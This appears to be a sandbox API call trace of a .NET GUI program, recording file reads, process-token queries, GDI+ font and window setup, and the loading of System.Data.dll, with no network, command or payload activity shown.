[0123.604] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a870, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a870*=0x1000, lpOverlapped=0x0) returned 1
[0123.604] GetLastError () returned 0x0
[0124.003] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a9a0, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a9a0*=0x1000, lpOverlapped=0x0) returned 1
[0124.003] GetLastError () returned 0x0
[0124.005] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a758, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a758*=0x5b3, lpOverlapped=0x0) returned 1
[0124.005] GetLastError () returned 0x0
[0124.005] ReadFile (in: hFile=0x370, lpBuffer=0x273d97c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19a8f4, lpOverlapped=0x0 | out: lpBuffer=0x273d97c*, lpNumberOfBytesRead=0x19a8f4*=0x0, lpOverlapped=0x0) returned 1
[0124.005] GetLastError () returned 0x0
[0124.013] CloseHandle (hObject=0x370) returned 1
[0124.014] GetLastError () returned 0x0
[0124.030] GetCurrentProcess () returned 0xffffffff
[0124.030] GetLastError () returned 0x3f0
[0124.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x370) returned 1
[0124.030] GetLastError () returned 0x3f0
[0124.033] GetCurrentProcess () returned 0xffffffff
[0124.033] GetLastError () returned 0x3f0
[0124.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x36c) returned 1
[0124.033] GetLastError () returned 0x3f0
[0124.036] GetCurrentProcess () returned 0xffffffff
[0124.036] GetLastError () returned 0x3f0
[0124.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ae38 | out: TokenHandle=0x19ae38*=0x374) returned 1
[0124.036] GetLastError () returned 0x3f0
[0124.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae7c | out: lpFileInformation=0x19ae7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0124.037] GetLastError () returned 0x2
[0124.038] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19a990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0124.038] GetLastError () returned 0x2
[0124.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae74 | out: lpFileInformation=0x19ae74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0124.038] GetLastError () returned 0x2
[0124.039] GetCurrentProcess () returned 0xffffffff
[0124.039] GetLastError () returned 0x3f0
[0124.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x378) returned 1
[0124.039] GetLastError () returned 0x3f0
[0124.050] GetCurrentProcess () returned 0xffffffff
[0124.050] GetLastError () returned 0x3f0
[0124.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x37c) returned 1
[0124.050] GetLastError () returned 0x3f0
[0124.236] GetCurrentProcess () returned 0xffffffff
[0124.236] GetLastError () returned 0x3f0
[0124.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19af30 | out: TokenHandle=0x19af30*=0x380) returned 1
[0124.237] GetLastError () returned 0x3f0
[0124.626] GetCurrentProcess () returned 0xffffffff
[0124.626] GetLastError () returned 0x3f0
[0124.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19af40 | out: TokenHandle=0x19af40*=0x384) returned 1
[0124.626] GetLastError () returned 0x3f0
[0125.077] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.078] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.078] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.079] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.079] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.080] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.125] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.126] GetLastError () returned 0x0
[0125.126] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.128] GetLastError () returned 0x0
[0125.128] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.128] GetLastError () returned 0x0
[0125.128] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.128] GetLastError () returned 0x0
[0125.128] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.129] GetLastError () returned 0x0
[0125.129] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.130] GetLastError () returned 0x0
[0125.166] GetSystemMetrics (nIndex=5) returned 1
[0125.166] GetSystemMetrics (nIndex=6) returned 1
[0125.192] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.202] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.202] GetLastError () returned 0x0
[0125.202] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.203] GetLastError () returned 0x0
[0125.203] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.203] GetLastError () returned 0x0
[0125.203] GetSystemMetrics (nIndex=5) returned 1
[0125.203] GetSystemMetrics (nIndex=6) returned 1
[0125.203] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.206] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.206] GetLastError () returned 0x0
[0125.206] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.207] GetLastError () returned 0x0
[0125.207] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.207] GetLastError () returned 0x0
[0125.207] GetSystemMetrics (nIndex=5) returned 1
[0125.207] GetSystemMetrics (nIndex=6) returned 1
[0125.207] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.211] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.211] GetLastError () returned 0x0
[0125.211] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.212] GetLastError () returned 0x0
[0125.212] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.212] GetLastError () returned 0x0
[0125.212] GetSystemMetrics (nIndex=5) returned 1
[0125.212] GetSystemMetrics (nIndex=6) returned 1
[0125.212] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.214] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.220] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.223] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.223] GetLastError () returned 0x0
[0125.223] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.223] GetLastError () returned 0x0
[0125.223] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.224] GetLastError () returned 0x0
[0125.224] GetSystemMetrics (nIndex=5) returned 1
[0125.224] GetSystemMetrics (nIndex=6) returned 1
[0125.224] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.224] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.225] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.226] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.226] GetLastError () returned 0x0
[0125.226] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.226] GetLastError () returned 0x0
[0125.226] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.227] GetLastError () returned 0x0
[0125.227] GetSystemMetrics (nIndex=5) returned 1
[0125.227] GetSystemMetrics (nIndex=6) returned 1
[0125.227] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.228] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.229] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.230] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.246] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.260] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.289] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.289] GetLastError () returned 0x0
[0125.289] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc08) returned 0x0
[0125.289] GetLastError () returned 0x0
[0125.289] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc00) returned 0x0
[0125.289] GetLastError () returned 0x0
[0125.289] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.289] GetLastError () returned 0x0
[0125.290] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.290] GetLastError () returned 0x0
[0125.290] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.290] GetLastError () returned 0x0
[0125.364] GdipGetFamilyName (in: family=0x6574b40, name=0x786f40, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0125.364] GetLastError () returned 0x0
[0125.419] CreateCompatibleDC (hdc=0x0) returned 0x380106da
[0125.419] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x1) returned 0x1b00017
[0125.429] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x2) returned 0x1900010
[0125.429] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x7) returned 0x185000f
[0125.430] GetLastError () returned 0x0
[0125.430] GetCurrentObject (hdc=0x380106da, type=0x6) returned 0x18a0048
[0125.430] GetLastError () returned 0x0
[0125.437] SaveDC (hdc=0x380106da) returned 1
[0125.437] GetLastError () returned 0x0
[0125.440] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0125.441] GetLastError () returned 0x0
[0125.442] CreateFontIndirectW (lplf=0x73db10) returned 0x2a0a0693
[0125.442] GetLastError () returned 0x0
[0125.447] GetObjectW (in: h=0x2a0a0693, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0125.447] GetLastError () returned 0x0
[0125.509] GetCurrentObject (hdc=0x380106da, type=0x6) returned 0x18a0048
[0125.509] GetLastError () returned 0x0
[0125.510] GetObjectW (in: h=0x18a0048, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0125.510] GetLastError () returned 0x0
[0125.526] SelectObject (hdc=0x380106da, h=0x2a0a0693) returned 0x18a0048
[0125.526] GetLastError () returned 0x0
[0125.530] GetMapMode (hdc=0x380106da) returned 1
[0125.530] GetLastError () returned 0x0
[0125.531] GetTextMetricsW (in: hdc=0x380106da, lptm=0x19dae8 | out: lptm=0x19dae8) returned 1
[0125.532] GetLastError () returned 0x0
[0125.534] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbf4, format=0x420, lpdtp=0x2775024 | out: lpchText="j^", lprc=0x19dbf4) returned 13
[0125.593] GetLastError () returned 0x0
[0125.594] GetSystemMetrics (nIndex=5) returned 1
[0125.594] GetSystemMetrics (nIndex=6) returned 1
[0125.616] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbec, format=0x420, lpdtp=0x27750c8 | out: lpchText="j^", lprc=0x19dbec) returned 13
[0125.617] GetLastError () returned 0x0
[0125.617] GetSystemMetrics (nIndex=5) returned 1
[0125.617] GetSystemMetrics (nIndex=6) returned 1
[0125.637] AdjustWindowRectEx (in: lpRect=0x19dd84, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd84) returned 1
[0125.639] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.639] GetLastError () returned 0x0
[0125.639] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.639] GetLastError () returned 0x0
[0125.639] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.639] GetLastError () returned 0x0
[0125.639] GetSystemMetrics (nIndex=5) returned 1
[0125.640] GetSystemMetrics (nIndex=6) returned 1
[0125.640] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.643] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.644] GetLastError () returned 0x0
[0125.644] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.644] GetLastError () returned 0x0
[0125.644] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.644] GetLastError () returned 0x0
[0125.644] GetSystemMetrics (nIndex=5) returned 1
[0125.644] GetSystemMetrics (nIndex=6) returned 1
[0125.644] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.881] sprintf_s (in: _DstBuf=0x19c034, _DstSize=0x12, _Format="set_%s" | out: _DstBuf="set_SharedState") returned 15
[0126.116] _DllBidInitialize@0 () returned 0x0
[0126.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x19d05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50
[0126.121] GetLastError () returned 0x7f
[0126.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x19cfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50
[0126.121] GetLastError () returned 0x7f
[0126.168] CoTaskMemAlloc (cb=0x8a) returned 0x78a6a8
[0126.168] CoTaskMemAlloc (cb=0xa2) returned 0x761e50
[0126.168] _DllBidEntryPoint@36 () returned 0x1
[0126.168] CoTaskMemFree (pv=0x78a6a8)
[0126.168] CoTaskMemFree (pv=0x761e50)
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.410] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.411] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.413] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0126.415] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.416] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.420] SetLastError (dwErrCode=0x0)
[0126.444] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.444] GetLastError () returned 0x0
[0126.444] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277dfec) returned 0x0
[0126.459] GetLastError () returned 0x0
[0126.459] GdipGetFontSize (font=0x546efc0, size=0x277dff0) returned 0x0
[0126.459] GetLastError () returned 0x0
[0126.471] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.473] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.541] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e23c) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] GdipGetFontSize (font=0x657f3b8, size=0x277e240) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.541] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.542] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e48c) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] GdipGetFontSize (font=0x657f3e0, size=0x277e490) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.542] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.543] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e6dc) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] GdipGetFontSize (font=0x657f408, size=0x277e6e0) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.543] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e92c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipGetFontSize (font=0x657f430, size=0x277e930) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277eb7c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipGetFontSize (font=0x657f458, size=0x277eb80) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.545] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.545] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.545] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277ed3c) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipGetFontSize (font=0x657f480, size=0x277ed40) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] GdipGetFontHeight (font=0x657f480, graphics=0x657f4a8, height=0x19dd30) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.546] GetLastError () returned 0x0
[0126.546] GdipDeleteGraphics (graphics=0x657f4a8) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.546] GetLastError () returned 0x0
[0126.558] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.558] GetLastError () returned 0x0
[0126.558] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] GdipGetFontHeight (font=0x657f480, graphics=0x657f4a8, height=0x19dcc4) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.570] GetLastError () returned 0x0
[0126.570] GdipDeleteGraphics (graphics=0x657f4a8) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.570] GetLastError () returned 0x0
[0126.570] GetSystemMetrics (nIndex=5) returned 1
[0126.570] GetSystemMetrics (nIndex=6) returned 1
[0126.581] GetSystemMetrics (nIndex=5) returned 1
[0126.581] GetSystemMetrics (nIndex=6) returned 1
[0126.582] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.589] GetSystemMetrics (nIndex=5) returned 1
[0126.589] GetSystemMetrics (nIndex=6) returned 1
[0126.589] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.591] GetSystemMetrics (nIndex=5) returned 1
[0126.591] GetSystemMetrics (nIndex=6) returned 1
[0126.592] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.592] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.592] GetLastError () returned 0x0
